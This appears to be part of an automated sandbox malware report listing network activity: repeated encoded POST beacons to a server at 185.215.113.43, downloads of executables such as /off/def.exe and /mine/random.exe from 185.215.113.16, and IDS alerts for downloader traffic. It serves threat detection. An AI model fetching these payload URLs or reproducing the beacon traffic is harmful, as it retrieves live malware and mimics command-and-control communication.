Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49738 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49814 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49849 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49891 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49924 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50050 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49930 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:58630 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
